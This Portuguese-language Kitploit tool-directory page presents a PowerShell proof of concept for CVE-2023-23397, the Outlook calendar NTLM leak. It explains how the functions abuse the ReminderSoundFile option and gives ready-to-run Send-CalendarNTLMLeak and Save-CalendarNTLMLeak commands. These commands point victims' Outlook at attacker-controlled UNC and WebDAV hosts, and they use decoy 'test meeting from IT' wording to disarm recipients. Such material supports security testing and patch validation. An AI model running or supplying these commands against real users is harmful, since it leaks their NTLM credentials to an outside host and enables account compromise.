Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-23397-POC-Powershell | Kitploit
Ferramentas/GitHubGitHub/api0cradle/cve-2023-23397-poc-powershell
Ferramentas de PhishingAnálise de VulnerabilidadesExploraçãoExfiltração de DadosTestes de PenetraçãoSegurança de Email
GitHubapi0cradle/cve-2023-23397-poc-powershell

CVE-2023-23397-POC-Powershell

Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
34658há 3 anosRevisado pelo Kitploit

CVE-2023-23397-POC-Powershell

Funções de script para enviar ou salvar vazamento NTLM de calendário usando a opção ReminderSoundFile. Execute o script para carregar as funções no Powershell e, em seguida, use os exemplos abaixo como ponto de partida para usar as funções. Requer execução em uma máquina Windows com o Outlook instalado, pois usa o objeto COM do Outlook para enviar e-mails. Observe que o e-mail será enviado da conta de e-mail associada ao Outlook. As funções atuais adicionarão o horário de início da reunião no momento em que o script for executado e o definirão com duração de 2 horas.

Enviando:

root@kitploit:~
Send-CalendarNTLMLeak -recipient "[email protected]" -remotefilepath "\\10.10.10.10\notexists\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"
Send-CalendarNTLMLeak -recipient "[email protected]" -remotefilepath "\\files.domain.com\notexists\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"
Send-CalendarNTLMLeak -recipient "[email protected]" -remotefilepath "\\files.domain.com@80\notexists\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"
Send-CalendarNTLMLeak -recipient "[email protected]" -remotefilepath "\\files.domain.com@SSL@443\notexists\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"

Salvando:

root@kitploit:~
Save-CalendarNTLMLeak -remotefilepath "\\10.10.10.10\notexists\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"
Save-CalendarNTLMLeak -remotefilepath "\\files.domain.com\notexists\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"
Save-CalendarNTLMLeak -remotefilepath "\\files.domain.com@80\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"
Save-CalendarNTLMLeak -remotefilepath "\\files.domain.com@SSL@443\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"

Hackeie o Planeta!

Baixar ferramenta